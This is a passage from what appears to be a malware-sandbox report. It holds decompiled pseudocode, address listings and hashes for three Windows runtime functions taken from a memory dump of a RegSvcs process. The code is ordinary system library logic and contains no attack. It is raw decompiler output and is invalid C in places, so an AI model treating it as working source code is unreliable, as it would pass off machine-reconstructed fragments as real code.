Opcode ID: c7c8bd4a808c4f4028b748f40c14c1075cd8cbb8e4f211ff2aa9e4431b5a998d
Instruction ID: cd7c2751c5867ef298822b0286d22db1b2dbd833a43527d5196a41446f6bdcbc
Opcode Fuzzy Hash: c7c8bd4a808c4f4028b748f40c14c1075cd8cbb8e4f211ff2aa9e4431b5a998d
Instruction Fuzzy Hash: 2AC111755083808FD754CF28C580A6AFBE1BF88708F184AAEF9D98B352D775E945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00FE03E2 Relevance: 1.8, APIs: 1, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00FE03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x10ad360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E00FE0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E00FFB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E00FCB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x10a7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E00FD7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E00FD7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01037016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E00FF9830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E010369A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x10a7c04 != 0) {
						_t118 = _v12;
						_t120 = E0103A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x10a7bd8;
						if( *0x10a7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E00FF95D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E00FF99A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E01033540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E00FBB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E00FFAAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x10a8474 - 3;
										if( *0x10a8474 != 3) {
											 *0x10a79dc =  *0x10a79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E00FD7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E00FD7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E01037016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x10a8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x10a7b00; // 0x0
							asm("ror esi, cl");
							 *0x10ab1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E00FF95D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E00FC7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x00fe03f1
0x00fe03f7
0x00fe03f9
0x00fe03fb
0x00fe03fd
0x00fe0400
0x00fe040a
0x01024c7a
0x00fe0537
0x00fe0547
0x00fe0410
0x00fe0410
0x00fe0414
0x00fe0417
0x00fe041a
0x00fe0421
0x00fe0424
0x00fe042b
0x00fe043b
0x00fe043e
0x00fe043f
0x00fe043f
0x00fe0446
0x00fe0449
0x00fe044c
0x00fe044f
0x00fe0459
0x01024c8d
0x00fe045f
0x00fe045f
0x00fe045f
0x00fe0467
0x01024c97
0x01024c9d
0x01024ca4
0x01024caa
0x01024caf
0x01024cb1
0x01024cc3
0x01024cb3
0x01024cbc
0x01024cbc
0x01024cc8
0x01024ccb
0x01024cd7
0x01024cda
0x01024cdf
0x01024cdf
0x01024ccb
0x01024ca4
0x00fe046d
0x00fe046f
0x00fe046f
0x00fe0471
0x00fe0476
0x00fe047a
0x00fe047b
0x00fe0483
0x00fe0489
0x00fe048d
0x00000000
0x00000000
0x01024ce9
0x01024cef
0x01024d22
0x01024d22
0x00000000
0x01024d22
0x01024cf1
0x01024cf7
0x00000000
0x00000000
0x01024cf9
0x01024cff
0x00000000
0x00000000
0x01024d05
0x01024d07
0x00000000
0x00000000
0x01024d0d
0x01024d0f
0x01024d14
0x01024d16
0x00000000
0x00000000
0x01024d1c
0x01024d1c
0x00fe0499
0x00fe0535
0x00fe0535
0x00000000
0x00fe0535
0x00fe04a6
0x01024d2c
0x01024d37
0x01024d39
0x01024d3b
0x00000000
0x00000000
0x01024d41
0x01024d48
0x00fe0527
0x00fe052b
0x00fe052d
0x00fe0530
0x00fe0530
0x00000000
0x00fe052b
0x01024d4e
0x00fe04ac
0x00fe04ac
0x00fe04af
0x00fe04b2
0x00fe04b7
0x00fe04b9
0x00fe04bb
0x00fe04bd
0x00fe04bf
0x00fe04c5
0x00fe04c9
0x01024d53
0x01024d59
0x01024db9
0x01024dba
0x01024dbf
0x01024dc2
0x01024dc4
0x01024dc7
0x01024dce
0x00000000
0x01024dce
0x01024d5b
0x01024d61
0x00000000
0x00000000
0x01024d63
0x01024d69
0x00000000
0x00000000
0x01024d6b
0x01024d6e
0x01024d74
0x01024d76
0x01024d7c
0x01024d7e
0x01024d84
0x01024d89
0x01024d8c
0x01024d8d
0x01024d92
0x01024d95
0x01024d96
0x01024d98
0x01024d9a
0x01024d9f
0x01024da4
0x01024da6
0x01024da8
0x01024daf
0x01024db1
0x01024db1
0x01024daf
0x01024da6
0x01024d84
0x01024d7c
0x00000000
0x01024d74
0x00fe04d6
0x01024de1
0x00fe04dc
0x00fe04dc
0x00fe04dc
0x00fe04e4
0x01024deb
0x01024df1
0x01024df8
0x01024dfe
0x01024e03
0x01024e05
0x01024e17
0x01024e07
0x01024e10
0x01024e10
0x01024e1c
0x01024e1f
0x01024e35
0x01024e35
0x01024e1f
0x01024df8
0x00fe04f1
0x00fe04fa
0x01024e3f
0x01024e47
0x01024e5b
0x01024e61
0x01024e67
0x01024e69
0x01024e71
0x01024e73
0x00fe0500
0x00fe0500
0x00fe0500
0x00fe04fa
0x00fe0508
0x00fe051d
0x00fe051d
0x00fe051f
0x00fe0524
0x00000000
0x00fe0524
0x00fe0515
0x00fe0517
0x01024e7a
0x01024e7c
0x00000000
0x00000000
0x01024e85
0x00000000
0x01024e85
0x00000000
0x00fe0517

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ba00c4759ae125391748515a325f70a11128fa41390c68dced42d2b00e2d2cc
Instruction ID: cff48e3c504ed2595d9e631096f1f8bcd1217932a21eec4538360809d9808f55
Opcode Fuzzy Hash: 5ba00c4759ae125391748515a325f70a11128fa41390c68dced42d2b00e2d2cc
Instruction Fuzzy Hash: 58912931E046699BEB31DB6DCC44BAD7BE4AF01724F150265FA90EB2D1DBB89C40DB81

Uniqueness

Uniqueness Score: -1.00%

Function 00FBB171 Relevance: 1.7, APIs: 1, Instructions: 166
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E00FBB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x108f7a8);
				E0100D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0100D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E00FFD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E00FFF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											E0100DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E00FFB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E00FFB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E00FFE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E00FFA890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x00fbb171
0x00fbb171
0x00fbb171
0x00fbb171
0x00fbb171
0x00fbb176
0x00fbb17b
0x00fbb180
0x00fbb186
0x00fbb18f
0x00fbb198
0x00fbb1a4
0x00fbb1aa
0x01014802
0x01014802
0x01014805
0x0101480c
0x0101480e
0x00fbb1d1
0x00fbb1d3
0x00fbb1de
0x00fbb1de
0x01014817
0x0101481e
0x01014820
0x01014822
0x01014822
0x01014824
0x01014824
0x0101482a
0x00000000
0x00000000
0x01014835
0x0101483a
0x0101483d
0x0101483f
0x01014842
0x01014842
0x01014842
0x01014846
0x0101484c
0x0101484e
0x01014851
0x01014851
0x01014853
0x01014854
0x01014854
0x01014858
0x0101485a
0x0101485a
0x0101485d
0x0101485f
0x01014861
0x01014861
0x01014866
0x0101486b
0x0101486e
0x01014871
0x01014876
0x01014876
0x01014878
0x0101487b
0x01014884
0x01014884
0x00000000
0x0101487d
0x0101487d
0x01014882
0x01014889
0x01014889
0x0101488f
0x01014891
0x010148e0
0x010148e2
0x010148e4
0x010148e4
0x010148e7
0x010148e7
0x010148ed
0x010148f4
0x010148f6
0x01014951
0x01014951
0x01014953
0x01014953
0x01014956
0x01014956
0x01014958
0x01014959
0x01014959
0x0101495d
0x0101495d
0x0101495f
0x0101495f
0x01014965
0x01014969
0x010149ba
0x010149ba
0x010149c1
0x010149c5
0x010149cc
0x010149d4
0x010149d7
0x010149da
0x010149e4
0x010149e5
0x010149f3
0x01014a02
0x00000000
0x01014a02
0x01014972
0x01014974
0x00000000
0x00000000
0x01014976
0x01014979
0x01014982
0x01014983
0x01014984
0x0101498b
0x0101498d
0x01014991
0x01014993
0x01014999
0x0101499d
0x010149a2
0x010149a2
0x010149a2
0x01014999
0x010149ac
0x00000000
0x010149b3
0x010148f8
0x010148fe
0x00000000
0x00000000
0x00000000
0x010148fe
0x01014895
0x0101489c
0x010148ad
0x010148b2
0x010148b5
0x010148b7
0x010148ba
0x010148bc
0x010148c6
0x010148c6
0x010148cb
0x010148d1
0x010148d4
0x010148d8
0x010148d8
0x00000000
0x010148d8
0x010148be
0x010148c0
0x00000000
0x00000000
0x010148c2
0x00000000
0x00000000
0x00000000
0x010148c4
0x00000000
0x01014882
0x0101487b
0x01014904
0x01014906
0x00000000
0x00000000
0x01014908
0x0101490e
0x00000000
0x00000000
0x01014910
0x01014917
0x01014917
0x00000000
0x01014917
0x00fbb1ba
0x010147f9
0x010147fc
0x00000000
0x00000000
0x00000000
0x010147fc
0x00fbb1c0
0x00fbb1c0
0x00fbb1c3
0x00fbb1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 010148AD

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: eed20670119f3dd4b47fe3c6e534492e3d59ad3c4f32d39edfaaa165d6d31ea9
Instruction ID: 6e727ff1c4658ba4a6b82a613c8e8945db840e54f9c25a1cdfe74e05659299b2
Opcode Fuzzy Hash: eed20670119f3dd4b47fe3c6e534492e3d59ad3c4f32d39edfaaa165d6d31ea9
Instruction Fuzzy Hash: 1A51F471D002598EEB31CF68C845BBEBBF1BF00710F1041ADE899EB2A6D7794945DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FDB944 Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00FDB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x10ad360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E00FD7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01088CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E00FF9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E00FFB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E00FFCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E00FD7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01088F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E00FFAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x10a8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x10a862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x10a8628; // 0x0
							_t116 =  *0x10a862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x00fdb94c
0x00fdb956
0x00fdb95c
0x00fdb95e
0x00fdb964
0x00fdb969
0x00fdb96d
0x00fdb96d
0x00fdb970
0x00fdb974
0x00fdb97a
0x00fdbadf
0x00fdbadf
0x00fdbae2
0x00fdbae4
0x00fdbae6
0x00fdbaf0
0x01022cb8
0x00fdbaf6
0x00fdbaf6
0x00fdbaf6
0x00fdbafd
0x00fdbb1f
0x00fdbb1f
0x00fdbaff
0x00fdbb00
0x00fdbb00
0x00fdbb03
0x00fdbb03
0x00fdbacb
0x00fdbacf
0x00fdbad0
0x00fdbad1
0x00fdbadc
0x00fdbadc
0x00fdb980
0x00fdb980
0x00fdb988
0x00fdb98b
0x00fdb98d
0x00fdb990
0x00fdb993
0x00fdb999
0x00fdb99b
0x00fdb9a1
0x00fdb9a5
0x00fdb9aa
0x00fdb9b0
0x00fdb9bb
0x00fdb9c0
0x00fdb9c3
0x00fdb9ca
0x00fdb9cc
0x00fdb9cf
0x00fdb9d3
0x00fdb9d7
0x00fdba94
0x00fdba94
0x00fdba98
0x00fdbaa3
0x01022ccb
0x00fdbaa9
0x00fdbaa9
0x00fdbaa9
0x00fdbab1
0x01022cd5
0x01022cdd
0x01022cdd
0x00fdbabb
0x00fdbabc
0x00fdbac2
0x00fdbac3
0x00fdbac3
0x00fdbac6
0x00000000
0x00fdb9dd
0x00fdb9dd
0x00fdb9e7
0x00fdb9e7
0x00fdb9ec
0x00fdb9ec
0x00fdb9f1
0x00fdb9f5
0x00fdb9fa
0x00fdba00
0x00fdba0c
0x00fdba10
0x00fdba10
0x00fdba12
0x00fdba18
0x00000000
0x00000000
0x00fdbb26
0x00fdbb26
0x00fdba1e
0x00fdba1e
0x00fdba23
0x00fdba25
0x00fdba2c
0x00fdba30
0x00fdba35
0x00fdba35
0x00fdba41
0x00fdba46
0x00fdba4c
0x00fdba50
0x00fdba54
0x00fdba6a
0x00fdba6e
0x00fdba70
0x00fdba74
0x00fdba78
0x00fdba7a
0x00fdba7c
0x00fdba8e
0x00fdba90
0x00fdba92
0x00fdbb14
0x00fdbb14
0x00fdbb16
0x00fdbb16
0x00000000
0x00fdba7c
0x00fdbb0a
0x00fdbb0d
0x00000000
0x00000000
0x00000000
0x00fdbb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FDB9A5

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 2fbcaf6f28dd7d708c82b04f26922c7b356e7e9f5b20accf5601621780942f83
Instruction ID: fbe66378ccbb1bb84a606d861355731aaade47346201fbc43cbbe6f26cab2dec
Opcode Fuzzy Hash: 2fbcaf6f28dd7d708c82b04f26922c7b356e7e9f5b20accf5601621780942f83
